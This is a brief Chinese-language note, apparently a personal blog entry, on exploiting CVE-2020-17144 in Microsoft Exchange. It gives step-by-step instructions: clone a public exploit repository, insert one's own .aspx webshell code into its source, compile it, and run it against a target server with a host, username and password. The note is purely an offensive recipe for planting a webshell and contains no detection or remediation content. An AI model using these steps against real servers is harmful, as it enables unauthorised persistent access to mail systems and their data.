【笔记】CVE-2020-17144漏洞利用

前言

利用Airboi/CVE-2020-17144-EXP实现Exchange文件写入漏洞利用

下载项目

1
2
git clone https://github.com/Airboi/CVE-2020-17144-EXP.git
cd CVE-2020-17144-EXP

修改文件

  • 修改14行,将this is a webshell替换为WebShell

<str>.aspx格式的WebShell代码

CVE-2020-17144/ExploitClass.cs
1
string data = "<str>";

编译项目

  • 通过VisualStudio编译项目为可执行文件CVE-2020-17144.exe

漏洞利用

<domain_or_ip>:Exchange服务端域名或IP地址
<username>:Exchange登录用户名
<password>:Exchange登录密码

1
.\CVE-2020-17144.exe <domain_or_ip> <username> <password>

完成